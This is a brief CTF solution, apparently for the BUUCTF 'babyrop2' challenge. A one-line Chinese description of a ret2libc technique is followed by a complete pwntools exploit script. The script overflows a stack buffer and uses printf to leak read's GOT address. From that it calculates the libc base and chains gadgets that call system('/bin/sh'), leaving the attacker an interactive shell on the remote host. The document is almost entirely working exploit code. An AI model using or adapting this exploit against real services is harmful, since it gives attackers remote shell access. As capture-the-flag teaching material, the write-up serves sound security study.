ret2libc
通过printf泄露read的函数地址计算libc的基址,ROP链构造system(‘/bin/sh’)
from pwn import * r=remote('node3.buuoj.cn',26686) elf=ELF('./babyrop2') libc=ELF('./libc.so.6') rdi_ret=0x400733 rsi_r15_ret=0x400731 format_str=0x400770 #%s read_got=elf.got['read'] printf_plt=elf.plt['printf'] main_addr=0x400636 payload='a'*0x20+'b'*0x8 payload+=p64(rdi_ret)+p64(format_str) payload+=p64(rsi_r15_ret)+p64(read_got)+p64(0x0) payload+=p64(printf_plt)+p64(main_addr) r.recvuntil("What's your name?") r.sendline(payload) read_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00')) libc_base=read_addr-libc.symbols['read'] system_addr=libc_base+libc.symbols['system'] binsh_addr=libc_base+libc.search('/bin/sh').next() payload2='a'*0x20+'b'*0x8+p64(rdi_ret)+p64(binsh_addr)+p64(system_addr)+p64(main_addr) r.recvuntil("What's your name?") r.sendline(payload2) r.interactive()